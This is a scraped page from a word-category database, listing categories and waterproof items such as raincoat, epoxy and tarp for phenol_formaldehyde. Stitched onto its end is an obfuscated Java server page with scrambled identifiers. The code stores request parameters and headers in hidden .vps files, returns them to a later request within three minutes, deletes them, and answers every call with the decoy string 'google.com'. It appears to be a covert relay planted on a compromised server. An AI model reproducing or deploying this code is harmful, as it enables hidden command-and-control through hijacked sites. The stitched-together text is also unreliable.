Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
phenol_formaldehyde
with nuance
waterproof
:
waterproof:adhesive,
Simple categories matching
waterproof
:
item,
bag,
flooring,
material,
covering,
garment,
container,
metal,
clothing,
layer,
quality,
outerwear,
membrane,
coating,
location,
paper,
apparel,
device,
toy,
article,
polymer,
clothes,
structure,
product,
adhesive,
object,
glove,
paint,
surface,
boot,
fabric,
sheeting,
footwear,
cover,
substance,
shell,
makeup,
seal,
Members with property
waterproof
:
copper_sheet,
raincoat,
mucilage,
jacket,
marble,
backpack,
lead,
sheath,
epoxy,
jaconet,
mitten,
nylon,
bottle,
polyester_fleece,
polyethylene,
freezer_bag,
hat,
tile,
concrete_floor,
boat,
plastic_sheeting,
boot,
wellington,
asphalt,
glass,
power_paper,
shirt,
rubber,
cover,
car,
acrylic,
batiste,
oiled_rayon,
waterproof_dildo,
rubber_glove,
boat_paint,
fabric_paint,
exterior_concrete,
bubble_blanket,
plastic_spoon,
olive_barrels,
milk_carton,
butter,
zinc_alloy,
hood,
polyvinyl-chloride_material,
super_glue,
waterproof_felt,
planter,
rubber_sheeting,
building,
snow_boot,
bitumen,
sandwich_box,
shoe,
cup,
tarp,
vase,
waterproof_mascara,
plastic,
treated_leather,
walking_boot,
dishwashing_glove,
ball,
sb,
plastic_blanket,
cloak,
gaiter,
butyl_adhesive,
biscuit_tin,
plexiglas,
egg_shell,
table_top,
waxed_paper,
ceramic_tile,
natural_stone,
tile_marble,
tunnel,
steel,
shed,
plasticine,
rain_boot,
anorak,
half_barrels,
crayon,
sportswear,
dome,
cake_pan,
waterproof_case,
neoprene,
bitumen_paint,
waterproof,
resorcinol,
ascot,
windcheater,
nylon_polyurethane,
natural_rubber,
latex,
brass,
glacier_glove,
polythene,
shoes,
margarine_tub,
fleece_backing,
paint,
masonry_wall,
urn,
dry_bag,
apron,
oakum,
overshoe,
wooden_block,
glove,
diaper,
grease,
nylon_fabric,
nitrile_rubber,
firefighter_boot,
button,
plastic_bin,
nitrile,
basket,
medical_record,
asphalt_sheet,
oil,
mountaineering_boot,
water_shield,
trouser,
rafts,
plastic_sheet,
plastic_tarp,
plastic_paint,
oiled_leather,
enamel_paint,
lipstick,
tarpaulin,
mackintosh,
clay,
seamed_waterproof,
tent_rainfly,
bituminous_felt,
driveway,
house,
waterproof_nylon,
rain_gear,
mac,
neoprene_rubber,
ski_suit,
rubber_duck,
gutter,
cape,
garbage_bag,
ice_cooler,
polyethylene_sheet,
jar,
iron_kettle,
waterproof_safe,
wrap,
metal,
pelican_box,
ceramics,
dustbin,
felt,
ski_clothing,
isocyanate,
lunch_box,
canvas,
slate,
plastic_toy,
concrete,
tar,
air,
epoxy_cement,
overall,
aluminum,
dacron,
metal_box,
basement,
roof,
enamel,
parka,
epoxy_enamel,
silicon_clay,
foam_mat,
rain_jacket,
waterproof_coat,
umbrella,
ice,
polyurethane,
ammo_box,
zinc,
food_container,
deli_container,
waterproof_zipper,
reynolds_wrap,
winter_boot,
caulking_compound,
coat,
flower_pot,
linoleum,
street,
waterproof_paint,
stone,
floor,
porcelain,
foil_pack,
foil,
polyvinyl-chloride_pvc,
copper,
oiled_silk,
swimming_bag,
sequin,
duck_shoes,
transparent_polyurethane,
cement,
tub,
washtub,
wax,
steel_pipe,
lantern_housing,
basic_windbreaker,
oilcloth,
pvc,
porch_enamel,
pavement,
leather,
sidewalk,
mitt,
down_coat,
barrels,
wool,
pitch,
overcoat,
building_paper,
silicone_grease,
metal_sheeting,
painted_sheepskin,
weir,
shawl,
phenol_formaldehyde,
cotton_canvas,
waterproof_matchbox,
epoxy_paint,
towel,
poncho,
roof_felt,
glass_jar,
plastic_apron,
formica_tabletop,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>